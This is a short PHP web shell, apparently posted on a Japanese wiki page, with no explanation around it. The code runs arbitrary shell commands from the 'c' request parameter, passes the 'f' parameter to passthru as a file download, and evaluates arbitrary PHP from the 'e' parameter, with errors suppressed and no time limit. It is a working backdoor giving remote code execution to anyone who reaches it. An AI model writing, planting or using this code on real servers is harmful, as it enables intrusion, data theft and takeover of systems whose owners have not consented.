<?php
 
 set_time_limit(0);
 
 if(isset($_GET["c"])) {
     header("Content-Type: text/plain");
     @passthru($_GET["c"]);
 } else if(isset($_GET["f"])) {
     header("Content-Type: application/octet-stream");
     header("Content-Disposition: attachment; filename=\"" . basename($_GET["f"]) . "\"");
     @passthru($_GET["f"]);
     exit;
 } else if(isset($_GET["e"])) {
     eval($_GET["e"]);
     exit;
 }
 
 ?>
 

トップ   編集 差分 バックアップ 添付 複製 名前変更 リロード   新規 一覧 単語検索 最終更新   ヘルプ   最終更新のRSS